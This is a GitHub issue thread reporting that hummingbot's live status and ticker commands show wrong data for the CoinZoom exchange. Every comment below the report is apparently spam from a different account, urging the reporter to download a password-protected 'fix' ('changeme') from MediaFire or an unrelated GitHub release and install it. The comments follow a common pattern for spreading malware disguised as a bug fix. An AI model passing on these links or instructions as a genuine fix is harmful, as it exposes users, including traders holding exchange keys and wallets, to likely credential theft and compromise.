### ISSUE TITLE
HBOT is not showing accurrate data for status live and ticker live command for Coinzoom

### ISSUE THREAD

**Issue by bluecammut** [CoinAlpha/hummingbot#4762]
**Describe the bug**
- When running a strategy (ex: PMM) and input the  "status --live" or "ticker --live" command. The data on the output panel vs exchange is not the same.

**Steps To Reproduce**
1. Create a strategy
2. Start the strategy
3. Run the "status --live" command or the "ticker --live" command
4. compare the data on the output panel vs the exchange

**Screenshots**
<img width="1431" alt="coinzoom status" src="https://user-images.githubusercontent.com/79382440/142565783-1c4a9343-9ba8-42a9-b96b-2a257d7b85e1.png">

<img width="1426" alt="Coinzoom ticker" src="https://user-images.githubusercontent.com/79382440/142565780-a4416b7a-be5f-449c-aafa-a345f0e80cae.png">

**Release version**
// Include your bot's version number (Can be found at the upper left corner of your CLI).

**Attachments**
// Please attach your config file and log file to help us debug. It would be difficult for us to help you without those! 

*WARNING: Do NOT publish any exchange API keys or your wallet's private key. Whoever has access to them may steal your assets!*

**Optional: your discord username:**

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
